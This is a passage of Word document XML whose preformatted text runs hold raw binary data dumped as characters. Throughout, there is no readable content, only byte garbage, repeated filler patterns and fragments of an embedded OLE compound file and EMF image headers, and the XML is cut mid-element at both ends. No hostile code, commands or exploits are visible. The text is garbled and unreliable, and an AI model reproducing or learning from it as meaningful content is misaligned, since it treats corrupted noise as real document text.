        <w:t>z?##QE##QE##QE##QE##QE##QE##QE##????#?#4#?:???&gt;#k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?#???[zv????#??#t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#???#????#??????F'?n8?+w#~?\"v9?#?##l#V#?????ZK???#?H?#??3??2~??:`?????u?WT?????'???#@w?????##V#G_?m?#e[I???-?#_r?#?Ub?G#q#?f?[????y#{[?e?TH?</w:t>
        <w:br/>
        <w:t xml:space="preserve"> V#?d?{}E/?ui????l4?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Z????~Q??Υ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???s??/????]?$?.d?B????#f?#=?#??|tI?0??,?#&amp;0#c?#_w??'?v#k??o??G?#O&amp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#?c?#0I ?H#??r#????{??#???UJ?)o??]#?z??#??|?Y?#$?#PI8##W'?\??#?1????]D?#"7?o#?@?q????#??S?:??#??o????X?#$#~?k?1?#?g?2????#+??##?#??`?y#3?P#?E##QE##QE##QE##QE##W??#????/???,??K#}?_#??_?@?#???,t#???#&amp;??o???#?#Ha?U?*?????&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#?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QE##QE##QE##QE##QE##QE##QE##U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>v?i?5???#?#&lt;??)5~?#???a?&amp;?s?J###?0##?#??#[;????[#??????s?#{!#?g#?v?#?WQ?Ts?#??C?Up4t?##?Y?I?#?##????#h?x????.#Q??*?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,?Uz?8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.P(:??Fy*#}+J{x???Q2##??Q?j#5#{??#?R??V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j}??@#f???"pU?Z?N?z?????#"?#R?MF?XXg*H#?#???r0j??v?F?#`??????dD?#c]?&amp;?i#??#?5#?#??;?#(#??#???#f##?]???9?#P?c#?#?[##?O??Mc??`?#????4??5w?##QE##QE##QE##QE##QE##????#$#???:g???_tW??#????/???,??K##}'?'?|#?#?3F?#?#k?k?d??5???&amp;h??C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>z?##QE##QE##QE##QE##QE##QE##QE##??#?D^#???+????##??^?N#x????3^??:??y???#??[???T??#?5?&gt;#?`??#K????#?:q?##\`~U?cH???,??^hH??1\g?i?#???y?q?{???]??</w:t>
        <w:tab/>
        <w:t>??w?N??#C?0????###?#?Q?W?&amp;???#C#9#?##rvV?#5?]Y?????#=}?{~?y??#{?#?Q[#??\#??WTP#1?#?wv?#KXaQ?h?9?!D??W'??g??y??&lt;? ??#&gt;??G?Z??rjA??#s???.Nz#??C??''?J25?vZ???????w</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#???#}???r???W?x?}?R#??#????:?#??O?h?s?^Z??r???i?-??/?????.?F???#=?#?#J???:v?T#QE##QE##QE##QE##QE##W??#????/???,??K#}?_#??_?@?#???,t#???#&amp;??o???#?#Ha?U?*?????&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#?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QE##QE##QE##QE##QE##QE##QI@9? #?#?u???r??[h???v???#{?&gt;#??u???K?#???]?#t?H???v?#J??3??##?W?h7K6?#&lt;??~?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>疒</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#n</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>蚨</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??????:?#??C#v?.A#</w:t>
        <w:tab/>
        <w:t>??*??N??#?w???#gp#;?9??d?m`yVK?????K#T#???/Ao##*?#Z?$?S?RY?#A?==???F#;?O???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j[-?7?'?'?Q?#?B{???4???&lt;??3#??,???J?3?#??U?1?@?d??</w:t>
        <w:tab/>
        <w:t>??U???C?v??s?a'tq??vO?sGa??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>b?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pP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?T??U???"???=??#?4?##le??x?^3S+?qZ#X#?#-G#??#!?8 ?4??nG\t?!?R#?)h#??(#??(#??(#??(#???#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:???#????|4?#?gL?#?X?#???;?Mc?????7???^?^U?'?|#?#?3F?#?#k?h#??(#??(#??(#??(#??d?,HY?*?In?#?????X?"?~??[#??[P??????$?H#"????~??.k?#&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>孴</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>??</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>&gt;z?</w:t>
        <w:br/>
        <w:t>?O??</w:t>
        <w:tab/>
        <w:t>?~$;@?zm?0???&amp;;?#`??#2?#6????#?s??W?iv?_i?#?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&lt;#???+?3?_?##H#?z?|E????#?#?^-?'?bq?????h???^??m??#?;y$x????Qnb?##??'8#?#??|4??#?e*??#?[?#?Q??#;??1?#???##]?##+r????#??~?%?QE%?60???Q???~S?]/??+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#as=??</w:t>
        <w:br/>
        <w:t>@R?##??#? x?Hkg???S?6??p#?i??#a8?5?&lt;M????V?Z?I?#z?0??k[O??c#??T|?a???#?&lt;6????#9?G"?#?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W?t?&lt;??##?w??D??&amp;Cq????W???P?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">韗 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>WH?-???1#?</w:t>
        <w:br/>
        <w:t>???##???#x?F???#??+[#Jh??????H?#?#~?##?E??)??Z%#??o</w:t>
        <w:tab/>
        <w:t>?CF???glc??#R?n?y?A??\??##?#??\k:L?-??`???5kK?9'?e"U###?#c#wd##</w:t>
        <w:tab/>
        <w:t>?A?#P,??##b??e|#??#(,W;W8?&lt;?N?Wo</w:t>
        <w:br/>
        <w:t>j??? #?T#xOQ#I??I??#?O?7?#n?##?6?#??,?1?\!??#?#??v?4????5?mmw&lt;S??9?EEr?7#?W?#?#?#0?^?^?n?##</w:t>
        <w:tab/>
        <w:t>m#?n#U??o1?&lt;?#?_r?~?q??kl?#???#</w:t>
        <w:tab/>
        <w:t>&gt;??B}/L??f?ly?##???#j??????#?</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>炵</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>/?Z?w??%??q#?gML[?#?????L???U?????#?T?????v#??#?#?</w:t>
        <w:tab/>
        <w:t>x???X?cn#9???*???;w</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??F???-S'?#v?(?&amp;?τ?#???#M??u??j7???O?5?v???xd#??G?^N???UB??#*?#?##?W4?R]&gt;o2##a??????:+#D?4#?T|E??O?mg??Xb?E#?(??#(??#+????H#?O?#t??%??</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>詛</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:#?O?N?#?X?7?#bf??#?0??~???k##?#?L??#?Z#(??#(??#(??#(???#E??#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?5#?&gt;??$???O?y?q#k??#x?mY?"-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???GV??Q?G?n5?????V?c?#?#?\??? #?#???#</w:t>
        <w:br/>
        <w:t>?1?d??F?#??#??#?av?????#??ZRG?##$??/?=J?4???1# ?????Q?H???#+0bS?#?O??&amp;?#???#?=?e-??J??$#@#??$??0z?WZ??g#6?cV*d??#s?????s^2? ??O?T#?#?9?pH]?#???X?ks[^?71??8#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#&lt;?y?H?_5?V?l#??0I???G?#?#??^"?rF#BG??L{?#P?????##?????"&lt;?`#?#K????S????##?#2%??_0?/?????G-??#?|?7?&gt;A???0??V]]m?+%?E?#?I(###w?V]?m?7&gt;Hc?#?6#?0????U-;]??????&lt;??T#?c'.??(??#:#5?yD?ob!?#???a[????.v??[???8#??1??#O?\?#?Z?#WveX?p3?#?#@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p??n?7n?Y??#??#&gt;?#???d?#????I4#&lt;d;@#?&lt;?ca?Р#?##[??&lt;?#??F#?-?3?????#?W(7Ds??_???5?i?#???\(?0s???J?#W?+a??0?_`l?7??#z?/ #m?g?##T??}=@?7???u??4@?&gt;=3?#?+#??Ex??l#p?#`?q??b#?w??w??'#?? ?&gt;??*</w:t>
        <w:tab/>
        <w:t>5k?G?=??e??#?#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?&lt;?o?'?)f$#?f?#???b^K-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H? ??O???##?#??CZ?4Z??m*????#???W#l#?##o?k????J?????2#??P?w=pkf??9##? #?#'#?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#?#A#?_#x?K?#?#?#'??$?v?????pT?#Ef?r??{:? #?=#??3??%#m??|??v=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>v@?j?'qh??C</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>?_?z?#?#????3?#Ic??+????H#?O?#t??%??&gt;??????&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#?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?_?w??????#4o?!??V?</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??</w:t>
        <w:br/>
        <w:t>(??!??KHd?R#4#??#??X?????Q#q?[?#&lt;a#?4(m?O)?#?A?*?$#^???N??dh?#?#??##?Z?#9\??y#=?##?#?#?#???β-?AexT?y#?6H#@?V??#EV??#n??#?????1?M[PI/$# ?v?p3?????#?V?C}j?#???????@1?#????iN#c#?!???z???Ooe??;H?#? ???_a?Wt+3#P2i??k?7J?Y#[??A??q/??#??Y#nf?R?q?*+?#{???##?y#??\UI4?#?#??|ǚvv???t?#L?7?]I6?U?VPS??1?3?2?#?i4#)/-&gt;??$j?#J???vs?#???[#?V?q ?#1D??T?U;y? w????R?#`? W??W??\1?;#Kc#aW?</w:t>
        <w:br/>
        <w:t>s??1?#];??t?? e??l?&lt;???t??~2x??#=&amp;5PpY?dn?1#s???S?j?????#?#??##???? #z#-?#sN?D??HgUu1???O(rA????B?=C#?P????6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#e???#T??R01?ré.,.t}.?h??0e_6$?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#!O\#??9t?#nqj??#7???L?8??zgp?:s0rQ?8#?r??#)A??}##???\???O?-???O#??#c???\??&lt;(#9?0?O#?F??B?.?9=</w:t>
        <w:tab/>
        <w:t>?p?????#?-`???#o#?!u#?|??o?#-???c?##T???Xq?YF???#|?#1?O??#?F?#?7?#7??R?M?##[%#?zt??)J?#??,#??+????\BM? ??????*??#n#8?#?A???WV??a&amp;</w:t>
        <w:br/>
        <w:t>?#?#?##????1?z?x?7C????&amp;??#?"?###p?G?G??H?q]?cU?????Q?#?#??=?#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???#??F?#$}I#????f?:Z??*?#,p??8q?d?}#?&gt;d.R?????z?B??l??#(?~^??SW?9M?/?_1[q#??T??q??W??#k??Dg?q????P?p??1i??6?c?#???y#r????#?Z9?P?e?Vx??? 8?#??#?#?R-????JK?$?#B??+??=???I22?#Fs?M?0#\U;y???#:???2#H#?I#??</w:t>
        <w:br/>
        <w:t>Afn#'#??'#}#??|#??S?#?#?i?????#</w:t>
        <w:tab/>
        <w:t>n?#?????~?i#???!s??' ???t#:?[?#à??F?#?Kk+?e#+#??p???kh????o??#TF??'??T???o#?x??.?#?BU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31?#?3?</w:t>
        <w:br/>
        <w:t>?%b????;R?!fxcf]?T#???J}`PQE##W??#????/???,??K#}?_#??_?@?#???,t#???#&amp;??o???#?#Ha?U?*?????&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?#?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QE##QE##QE##??@?N??]#?u+#?U?(f(??N??V??&gt;?n#?#????#????=G?????????x?+?&gt;7Y4:]?????#e??1?;#W#?x??#??+k?]?}?lc?##Vd?.?#NG???{ò[?E|t?????k???&lt;;|?z?#!?C`7?#?c?gh?6f??#9?Q??V??F}#}?Y#?o?u??v???N@?#?#?z#gm?# ?'???c?1?#:??7????av?7??y???Z?-?m-"@??+?Q?#9??#4#??`??/p????#?#?b??#?????%?$Q?x??4+??h#??l?g?V????.9m~?S???"o?????i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?6x?????-###~M&gt;?G</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#??I</w:t>
        <w:tab/>
        <w:t>??-0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2??X?8???????1?}?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>g?8?x?X#FB#G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n??]</w:t>
        <w:br/>
        <w:t>M???#?#*?????7?h#?#?????N???8???{$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??&gt;m?.~b??Q?}#3#??O?)q#???,5??I?j??h9???#?????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?o??|?x}??W??@?&gt;#?%????I(?#?#?ζ?c?</w:t>
        <w:br/>
        <w:t>x?NM?B??C?#?1??N?</w:t>
        <w:br/>
        <w:t>?#??7c???7?'z\*#f?#+&gt;# #q??#???/9?[_???#4&lt;c#I(???T???-?##??3??%?#?</w:t>
        <w:br/>
        <w:t>??[Y^,????NH?,?#,?#?I???!#?#'??zU??#??#</w:t>
        <w:br/>
        <w:t>??##'N?{a??#? d*8?i?|4? ?h)?N#F??/?*?#??#???4n????#?T\,?v###4,&lt;X??O0??Hp?A???'?F ??he?u??#%???u"m##6??1??#?8?#?#??????5!-?d#?#&lt;~mS#?#?v?.4??#??R=#?</w:t>
        <w:br/>
        <w:t>I??&amp;??I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##?s???cs?#?q@???#?#dI????|?#??@#?#???Z?????#`G????T???4(NWV?##??G?#\z#?&gt;#X#??R#?kp#??? ?????K???#???q??^Cs?ghh?kd??b]???Cg#?K??#@I??N?#?-F:##V#?##∥mO??Aj?#?2?#O?k????#O?#?H??#?Xw???S??#??)??n|/?*0k?T,I8}???Y??SE?K?#??E#9?N+?????u???m#???~"?u?qiV??#Z#fU?,8?+??KO#x}???k?8?8?O?#FO?^??#</w:t>
        <w:tab/>
        <w:t>??q?????1??&lt;#?n??y??]#X?cw?#,??#U#z?Z?h?b#NH?*$?</w:t>
        <w:br/>
        <w:t>?JZ(??#QE##????#$#???:g???_tW??#????/???,??K##}'?'?|#?#?3F?#?#k?k?d??5???&amp;h??C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>z?##QE##QE##QE##??xj??6R?]?#d#?j?F?|??#?-?#m?#?#?P??#?????##??b??f#?0k??n??Zc[?u??1#?h?K?&lt;????</w:t>
        <w:tab/>
        <w:t>??#????ˉE??"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>pZ??#??V???cg~???*O???4??\#?P??UYt8????S#?4??c?R???6???</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>yq?#&lt;$?##X7?#&gt;.?#?#U??</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>?k???%#?#???4a???g???G0#??x#?=?"_#??&lt;w#???????|9?(??k)???#`??m#?u5#?Z?L??g?c4??~#??#:_????9??#?????#??S??f#?-~???ld#?'?#uY?#i?u???:|??#??#!\|????A0?#?j?~$?#??k???##???u#??#z?#?#n???k?'KHF=-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&gt;6?x?O????#?j?Q??|m??O'?????</w:t>
        <w:tab/>
        <w:t>e#?Q??1??#??c9#??#?2#??</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>#?W_??+?s?#N?V??????#?#?W'?[J?????D?0#???#S??Fx??\?????P??!?j?u??\l?i#\?m]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>???Rǘ?#??w??5??M~?q?##??H&lt;??##?#??-O?;?#??{?&lt;=?Y???#?]????#??:???i??E??E~?#??#Ξ#?9??5?&gt;???&amp;??6???</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>嵳</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>#?$?#:?o?'O???#KZ??F#?i&lt;?##?g?(##A??O3#??cχ?#?#?D?*??y???^??|4?t??8???1?</w:t>
        <w:br/>
        <w:t>???q]??R?#?M???A1?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#R#??(#??(#???#g?? _</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>??Y???:???#????|4?#?gL?#?X?#</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>揄</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>?#?YO?U?##&lt;#???T#???ZG??&amp;???x#/3g?#n???8??]_??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T???????v?##P#?#????#???#?T????#???#?TQ@</w:t>
        <w:tab/>
        <w:t>?##??#?'?#?_?#qR?#????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??G??;????]??E##????#???#?T????#???#?TQ@#??;????]??^??=?#?i?#bΙ?#???E#??####################################################################################################################################################?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????4?#######a?#&gt;#?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????4?#######a?#&gt;#?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????4?#######a?#&gt;#?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????4?#######a?#&gt;#?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????4?#######a?#&gt;#?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????/?####????????4?#######a?#&gt;#?##$##$#If#####?&gt;#!v##h#5?####?#5?#######v##?##v####:V###?l##?X##?0###?#######?#######?#######?#######?#######?#####?####?###,?####5?####?#5?######/?####????????/?#######?####4?#######a?#&gt;####$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l##??#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#,?####5?####R#5?####?#5?####?#5?####?#5?####?#/?#######?#### ?########/?#######?####yt?\##?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt?\##?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt?\##?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt?\##?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt?\##?##$##$#If#####?##!v##h#5?####R#5?####?#5?####?#5?####?#5?####?#5?####?##v##R##v##?##v##?##v##?##v##?#:V###?l#</w:t>
        <w:br/>
        <w:t>t##?##?0###?#######?#######?#######?#######?#######?#####?####6#5?####R#5?####?#5?####?#5?####?#5?####?#yt?\##}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#3###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#4###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#5###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#6###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#7###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#8###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#3#9###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#0###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#1###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#2###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#3###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#4###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#5###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#6###}###D################################################################???y???#??#?#K?#############_#T#o#c#4#6#4#9#0#1#0#4#7###|###D#d#######</w:t>
        <w:br/>
        <w:t>###############?#?#?####################################?h###?#</w:t>
        <w:br/>
        <w:t>?#########</w:t>
        <w:br/>
        <w:t>##s##?*####?#?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????############ ###!###"#######$###`###????????????????????+###6###7###.###/###0###1###2###3###4###5###8###A###????9###:###;###&lt;###=###&gt;###?###@###^###T###C###D###E###F###G###H###I###J###K###L###M###N###O###P###Q###R###S###????###V###W###X###Y###Z###[###\###]###????{###????a###b###c###d###e###f###g###h###i###j###k###l###m###n###o###p###q###r###s###t###u###v###w###x###y###z###{###|###}###~######?###R#o#o#t# #E#n#t#r#y#################################################????????#####</w:t>
        <w:tab/>
        <w:t>######?######F#############?-X???#-###?)######D#a#t#a#########################################################</w:t>
        <w:br/>
        <w:t>###????????????########################################%M######W#o#r#d#D#o#c#u#m#e#n#t#################################################????????########################################l7######O#b#j#e#c#t#P#o#o#l#####################################################????########################0*#X???##?-X???#############_#1#3#8#9#8#7#9#0#5#3############################################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####?######F####0*#X???#0*#X???###############O#l#e#########################################################</w:t>
        <w:br/>
        <w:t>###????????????##################################################P#R#I#N#T#################################################################????########################################?#########C#o#m#p#O#b#j#####################################################????????????####################################@###j#######????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????A###????????D###E###F###G###H###I###J###K###L###M###N###O###P###Q###R###S###T###U###V###W###X###Y###Z###[###\###]###^###_###`###a###b###c###d###e###f###g###h###i###j###k###l###m###n###o###p###q###r###s###t###u###v###w###x###y###z###{###|###}###~######?#####################################################################e3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###?#####?#####?###&amp;###?#WMFC######## ?########?#######?#######l###############?###########b3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EMF####?###6###################v####</w:t>
        <w:tab/>
        <w:t>##?###)###############?4##]?##F###,### ###EMF+#@############??####?###?###F###\###P###EMF+"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@############??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!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</w:t>
        <w:br/>
        <w:t>###############!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!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?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!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?###R###p#######????############?######?####?[SO####################################################################?#?</w:t>
        <w:tab/>
        <w:t>??##??#0??##??##?#?</w:t>
        <w:tab/>
        <w:t>####&amp;#?#####??#0??##??##?#?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ###(?##??#0??######?#?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> ###??#0??##?#?</w:t>
        <w:tab/>
        <w:t xml:space="preserve"> #######??##</w:t>
        <w:br/>
        <w:t>?#0###################?####?[SO############################################################??#0########X?#####?#</w:t>
        <w:br/>
        <w:t>$####&amp;#?#?#</w:t>
        <w:br/>
        <w:t>$?#!??#?</w:t>
        <w:tab/>
        <w:t>??#0z?#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########?###(#######?$KA?)KA############L###############????????T###??#N</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
